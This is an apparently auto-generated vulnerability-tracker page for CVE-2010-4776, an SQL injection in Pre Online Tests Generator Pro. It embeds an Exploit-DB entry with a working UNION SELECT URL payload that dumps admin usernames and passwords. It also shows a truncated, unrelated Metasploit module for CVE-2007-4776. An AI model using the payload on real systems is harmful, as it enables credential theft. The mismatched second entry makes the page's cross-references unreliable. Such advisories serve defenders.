CVE-2010-4776
published 2011-03-23CVE-2010-4776: SQL injection vulnerability in takefreestart.php in PreProjects Pre Online Tests Generator Pro allows remote attackers to execute arbitrary SQL commands via…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.99%
58.0th percentile
SQL injection vulnerability in takefreestart.php in PreProjects Pre Online Tests Generator Pro allows remote attackers to execute arbitrary SQL commands via the tid2 parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pre Online Tests Generator Pro - SQL Injection
exploitdb·2010-11-13
CVE-2010-4776 Pre Online Tests Generator Pro - SQL Injection
Pre Online Tests Generator Pro - SQL Injection
---
In The Name Of GOD
[+] Exploit Title: Pre Online Tests Generator Pro SQL Injection Vulnerability
[+] Date: 2010-11-13
[+] Author : Cru3l.b0y
[+] Software Link: http://www.preproject.com/preexampro.asp
[+] Price : 95.00$
[+] Contact : [email protected]
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
http://target/path/takefreestart.php?tid=242&tid2=-1+union+select+1,2,3,group_concat(user_name,0x3a,user_pass),5,6,7,8+from+admin--&nxtq=true&q_no=1
[+] Admin Page: /admin
Exploit-DB
Microsoft Visual Basic - '.VBP' Local Buffer Overflow (Metasploit)
exploitdb·2010-09-25
CVE-2007-4776 Microsoft Visual Basic - '.VBP' Local Buffer Overflow (Metasploit)
Microsoft Visual Basic - '.VBP' Local Buffer Overflow (Metasploit)
---
##
# $Id: ms_visual_basic_vbp.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Visual Basic VBP Buffer Overflow',
'Description' => %q{
This module exploits a stack oveflow in Microsoft Visual
Basic 6.0. When a specially crafted vbp file containing a long
reference line, an attacker may be able to execute arbitrary
code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CV
No writeups or analysis indexed.
http://packetstormsecurity.org/files/view/95817/potgp-sql.txthttp://securityreason.com/securityalert/8158http://www.exploit-db.com/exploits/15526https://exchange.xforce.ibmcloud.com/vulnerabilities/63246http://packetstormsecurity.org/files/view/95817/potgp-sql.txthttp://securityreason.com/securityalert/8158http://www.exploit-db.com/exploits/15526https://exchange.xforce.ibmcloud.com/vulnerabilities/63246
2011-03-23
Published